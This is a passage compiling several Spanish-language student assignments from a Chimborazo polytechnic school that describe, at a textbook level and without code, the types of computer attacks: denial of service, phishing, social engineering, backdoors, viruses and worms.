un ataque de vulnerabilidad. Esa descarga puede infectar el equipo del usuario para daar
datos o robar informacin.
Impacto negativo sobre su reputacin e informacin personal

Los criminales informticos tambin pueden intentar acceder su informacin personal


rastreando la actividad de su computadora. Su computadora podra ser controlada sin su
conocimiento para visitar sitios web o participar en ataques masivos. El software
malintencionado puede robar su identidad o provocar que su computadora deje de funcionar.
Cuando se da aviso de que un sitio web contiene software malintencionado y no es seguro
visitarlo, esto afecta negativamente a la marca de la empresa y al trfico de su sitio web. Segn
el rubro de la empresa, una disminucin en el trfico web puede ser equivalente a una
disminucin de los ingresos.

ESCUELA SUPERIOR POLITECNICA DE CHIMBORAZO


Nombres: Danny Moina (5885), Geovanny Guamn (5375)
Fecha: 25-11-2015
QUE ES UN ATAQUE INFORMATICO
Un "ataque" consiste en aprovechar una vulnerabilidad de un sistema informtico (sistema
operativo, programa de software o sistema del usuario) con propsitos desconocidos por el
operador del sistema y que, por lo general, causan un dao. Los ataques siempre se producen en
Internet, a razn de varios ataques por minuto en cada equipo conectado. En su mayora, se lanzan
automticamente desde equipos infectados (a travs de virus, troyanos, gusanos, etc.) sin que el
propietario sepa lo que est ocurriendo. En casos atpicos, son ejecutados por piratas informticos.
Para bloquear estos ataques, es importante estar familiarizado con los principales tipos y tomar
medidas preventivas.

Los ataques pueden ejecutarse por diversos motivos:

para obtener acceso al sistema;


para robar informacin, como secretos industriales o propiedad intelectual;
para recopilar informacin personal acerca de un usuario;
para obtener informacin de cuentas bancarias;
para obtener informacin acerca de una organizacin (la compaa del usuario, etc.);
para afectar el funcionamiento normal de un servicio;
para utilizar el sistema de un usuario como un "rebote" para un ataque; para usar los
recursos del sistema del usuario, en particular cuando la red en la que est ubicado tiene
un ancho de banda considerable

TIPOS DE ATAQUES
Los sistemas informticos usan una diversidad de componentes, desde electricidad para
suministrar alimentacin a los equipos hasta el programa de software ejecutado mediante el
sistema operativo que usa la red.

Los ataques se pueden producir en cada eslabn de esta cadena, siempre y cuando exista una
vulnerabilidad que pueda aprovecharse a continuacin veremos los distintos tipos de ataques tanto
como fsicos como lgicos.

Acceso fsico: en este caso, el atacante tiene acceso a las instalaciones e incluso a los equipos:

-Interrupcin del suministro elctrico.


-Apagado manual del equipo.
-Vandalismo.
-Apertura de la carcasa del equipo y robo del disco duro.
-Monitoreo del trfico de red.

Intercepcin de comunicaciones:
-Secuestro de sesin.
-Falsificacin de identidad.
-Re direccionamiento o alteracin de mensajes.

Denegaciones de servicio: el objetivo de estos ataques reside en interrumpir el funcionamiento


normal de un servicio. Por lo general, las denegaciones de servicio se dividen de la siguiente
manera:

Explotacin de las debilidades del protocolo TCP/IP.


Explotacin de las vulnerabilidades del software del servidor.
-Anlisis de puertos.
-Elevacin de privilegios: este tipo de ataque consiste en aprovechar una vulnerabilidad en una
aplicacin al enviar una solicitud especfica (no planeada por su diseador). En ciertos casos, esto
genera comportamientos atpicos que permiten acceder al sistema con derechos de aplicacin. Los
ataques de desbordamiento de la memoria intermedia (bfer) usan este principio.
-Ataques malintencionados (virus, gusanos, troyanos).

Ingeniera social: en la mayora de los casos, el eslabn ms dbil es el mismo usuario. Muchas
veces es l quien, por ignorancia o a causa de un engao, genera una vulnerabilidad en el sistema al
brindar informacin (la contrasea, por ejemplo) al pirata informtico o al abrir un archivo adjunto.
Cuando ello sucede, ningn dispositivo puede proteger al usuario contra la falsificacin: slo el
sentido comn, la razn y el conocimiento bsico acerca de las prcticas utilizadas pueden ayudar a
evitar este tipo de errores.

Puertas trampa: son puertas traseras ocultas en un programa de software que brindan acceso a su
diseador en todo momento.
Es por ello que los errores de programacin de los programas son corregidos con bastante rapidez
por su diseador apenas se publica la vulnerabilidad. En consecuencia, queda en manos de los
administradores (o usuarios privados con un buen conocimiento) mantenerse informados acerca
de las actualizaciones de los programas que usan a fin de limitar los riesgos de ataques.

ATAQUES DE RED
ATAQUE POR INTROMISION

Se da cuando alguien abre archivos uno tras otro en nuestra computadora hasta encontrar algo que
sea de su inters. puede ser una persona que convive con nosotros.

ATAQUE DE ESPIONAJE EN LINEA

Se da cuando alguien escucha una conversacin y no es invitada a ella. es muy comn en redes inalmbricas
ya que no se requiere de un dispositivo conectado a la red, basta, con un rango donde la seal de la red llegue a
un automvil o un edificio cercano.

ATAQUE DE INTERSECCION

Se dedica a desviar la informacin a otro punto que no sea el destinatario y asi poder revisar los
archivos, informacin y contenidos en un flujo de red.

ATAQUE DE MODIFICACION

Se dedica a alterar la informacin que se encuentra validada en su computadora base de datos.es


muy comn en los bancos y casa de bolsas.

ATAQUE DE DENEGACION DE SERVICIOS

Se dedican a negarles el uso de los recursos a los usuarios legtimos del sistema, de la informacin o
inclusive de algunas capacidades del sistema como por ejemplo:

- Intento de inundar una red, impidiendo el trfico legtimo de red.


- Intento de romper la red entre 2 computadoras.
- Intento de impedir el acceso de un usuario individual a un servicio.
- Intento de romper los servicios a un sistema.
ATAQUE DE SUPLANTACION

Se dedica a dar informacin falsa o anelar una transaccin y/o hacerse pasar por un usuario
conocido. se ha puesto de moda los nuevos ladrones han hecho portales similares a los bancarios
donde las personas han descargado sus datos de tarjetas de crdito sin encontrar respuesta;
posteriormente sus tarjetas son vaciadas.

ATAQUES AL SOFTWARE

Virus:

Malware que modifica el comportamiento normal de la computadora sin la


autorizacin del usuario
Archivos ejecutables, sectores de arranque, BIOS, tabla de participacin.

Gusanos:

Iworm
Malware que se duplica a si mismo
No necesita modificar ficheros como el virus, puede residir en memoria.
Pueden dejar el PC sin recursos, duplicarse a travs de internet usando protocolos
como SMTP, IRC, P2P
Pueden ser la puerta de entrada de controles remotos por parte de terceras personas
(ejemplo: Blaster Worm)

ESCUELA SUPERIOR POLITCNICA DE CHIMBORAZO


FACULTAD DE INFORMTICA Y ELECTRNICA
ESCUELA DE INGENIERA EN SISTEMAS

INTEGRANTES:
JESS LEMA

CDIGO: 5867

FECHA: 25 de noviembre de 2015


CRIPTOGRAFA
DEFINICION DE ATAQUE
Los insiders (empleados disconformes o personas externas con acceso a sistemas
dentro de la empresa) utilizaban sus permisos para alterar archivos o registros.

Los outsiders (personas que atacan desde afuera de la ubicacin fsica de la


organizacin) ingresaban a la red simplemente averiguando una password vlida.

Programas malignos

Todo ordenador o sistema informtico est expuesto a una serie de amenazas de


tipo software que, por mucho que intentemos evitarlas, siempre van a estar ah.
Dichas amenazas son programas diseados con el nico propsito de causar daos
en los sistemas donde se ejecutan, como por ejemplo borrar el disco duro o
estropear el sistema operativo eliminando determinados archivos.

TIPOS DE ATAQUE
Ataque va correo electrnico
Se basa en el envi de un correo electrnico a un usuario con un script oculto en un
link a una direccin web, el atacante buscando motivar a su victima a seguir el
enlace le ofrece un premio, regalo u oferta si visita dicho vinculo, al verse atrado
por la informacin en el correo electrnico.

Software malicioso

Phishing
Se trata de desviar a los usuarios de sus paginas de Log legtimas por falsas, as,
wwww.hotmail.com a http://145.15573.484/login. La diferencia es que una reenva
lo escrito.

ATAQUES A RED
ATAQUE POR INTROMISION

se da cuando alguien abre archivos uno tras otro en nuestra computadora hasta
encontrar algo que sea de su interes. puede ser una persona que comvive con
nosotros.

ATAQUE DE ESPIONAJE EN LINEA

se da cuando alguien escucha una conversacion y no es invitada a ella. es muy


comun en redes inalambricas ya que no se requiere de un dispositivo conectado ala
red, basta, con un rango donde la seal de la red llegue a un automovil o un
edificio cercano.
ATAQUE DE INTERSECCION

se dedica a desviar la informacion a otro punto que no sea el destinatario y asi


poder revisar los archivos, informacion y contenidos en un flujo de red.

ATAQUE DE MODIFICACION

se dedica a alterar la informacion que se encuentra validada en su computadorao


base de datos.es muy comun en los bancos y casa de bolsas.

ATAQUES A SOFTWARE
Virus y Gusanos: stos, son los tipos ms conocidos de software maligno que
existen y se distinguen por la manera en que se propagan. El trmino de virus
informtico se usa para designar un programa que al ejecutarse se propaga
infectando otro software ejecutable de la misma computadora. Pueden tener un
playload que realice otras acciones maliciosas en donde se borran archivos. Los
gusanos son programas que se transmiten as mismos, explotando vulnerabilidades
en una red de computadoras para infectar otros equipos. Su principal objetivo, es
infectar a la mayor cantidad posible de usuarios y tambin puede contener
instrucciones dainas al igual que los virus. A diferencia que los gusanos, un virus
necesita la intervencin del usuario para propagarse, mientras que los gusanos se
propagan automticamente.

Backdoor o Puerta Trasera: Es un mtodo para eludir los procedimientos habituales


de autenticacin al conectarse en una computadora. Una vez que el sistema ha sido
comprometido, puede instalarse una puerta trasera para permitir un acceso remoto
ms fcil en el futuro de los atacantes. Los crackers suelen usar puertas traseras
para asegurar el acceso remoto a una computadora, permaneciendo ocultos ante
posibles inspecciones, utilizando troyanos, gusanos u otros mtodos.

Bibliografa
*Siglo XXI (2009). Sistemas de Informacin. Mxico.

*(10:30
P.M).
Consultado
en
20
de
Julio
http://es.wikipedia.org/wiki/Seguridad_inform%C3%A1tica.

*(10:50
P.M).Consultado
el
20
de
Julio
http://www.youtube.com/watch?v=iwwzJQjyRSg&hl=es

de

de

2009

2009

en

en

Integrantes:

Carlos Buay (5961)


Hernn Pinos (5919)
Alexander Balden (5767)
Definicin de ataque
Un "ataque" consiste en aprovechar una vulnerabilidad de un sistema informtico (sistema
operativo, programa de software o sistema del usuario) con propsitos desconocidos por el
operador del sistema y que, por lo general, causan un dao.
La mayora de los ataques siempre se producen en Internet, a razn de varios ataques por
minuto en cada equipo conectado. En su mayora, se lanzan automticamente desde equipos
infectados (a travs de virus, troyanos, gusanos, etc.) sin que el propietario sepa lo que est
ocurriendo. En casos atpicos, son ejecutados por piratas informticos.

Tipos de ataques
Trashing (cartoneo):
Este ocurre generalmente cuando un usuario anota su login y password en un papelito y luego,
cuando lo recuerda, lo arroja a la basura. Esto por ms inocente que parezca es el que puede
aprovechar un atacante para hacerse de una llave para entrar al sistema.
Monitorizacin:
Este tipo de ataque se realiza para observar a la vctima y su sistema, con el objetivo de
establecer sus vulnerabilidades y posibles formas de acceso futuro.
Ataques de autenticacin:
Este tipo de ataque tiene como objetivo engaar al sistema de la vctima para ingresar al
mismo. Generalmente este engao se realiza tomando las sesiones ya establecidas por la
vctima u obteniendo su nombre de usuario y password.
Denial of Service(DOS):
Los protocolos existentes actualmente fueron diseados para ser hechos en una comunidad
abierta y con una relacin de confianza mutua. La realidad indica que es ms fcil desorganizar
el funcionamiento de un sistema que acceder al mismo; as los ataques de Negacin de
Servicio tienen como objetivo saturar los recursos de la vctima de forma tal que se inhabilita
los servicios brindados por la misma.
Modificacin (dao): la modificacin o dao se puede dar como:
Tampering o Data Diddling: Esta categora se refiere a la modificacin desautorizada de los
datos o el software instalado en el sistema vctima (incluyendo borrado de archivos). Borrado
de Huellas: El borrado de huellas es una de las tareas ms importantes que debe realizar el
intruso despus de ingresar en un sistema, ya que, si se detecta su ingreso, el administrador
buscar como conseguir "tapar el hueco" de seguridad, evitar ataques futuros e incluso
rastrear al atacante.

Ataques a Red :

Podemos clasificar los ataques de denegacin de servicio en tres categoras:


Inundacin de conexiones: normalmente el protocolo que se usa es TCP, al ser conectivo,
fiable y orientado a conexin. El propio protocolo TCP pide el reenvo de los paquetes perdidos
y se encarga de la fragmentacin y el re-ensamblado (no como UDP sobre IP). El atacante
establece cientos de conexiones en el servidor hasta que que se colapsa y no puede aceptar las
conexiones de usuarios legtimos.

Inundacin de ancho de banda: el usuario malintencionado enva muchos paquetes al


servidor, impidiendo que los paquetes legtimos puedan llegar a l, no hay suficiente ancho de
banda para ms paquetes.

Ataque de vulnerabilidad: si en el servidor hay alguna vulnerabilidad, el atacante se centra en


explotarla mandando mensajes construidos especficamente para provocar el fallo de la
mquina.

Ataques a Software:
Los ataques a Software la mayor parte son programas informticos diseados por
ciberdelincuentes conocidos como malware, para causarle algn dao o perjuicio al usuario
como el robo de informacin, modificaciones al sistema operativo y las aplicaciones instaladas
o tomar el control total del equipo

Wiki grafa:
http://www.ecured.cu/Ataque_inform%C3%A1tico
http://es.ccm.net/contents/17-introduccion-a-los-ataques
http://www.coreoneit.com/tipos-de-ataques-informaticos/
http://www.redeszone.net/2010/11/03/ataques-a-las-redes-listado-de-diferentes-ataques-alas-redes-de-ordenadores/
http://www.semana.com/tecnologia/tips/articulo/que-malware-como-puedeprevenir/372913-3
http://www.redeszone.net/2010/11/03/ataques-a-las-redes-listado-de-diferentes-ataques-alas-redes-de-ordenadores/

Potrebbero piacerti anche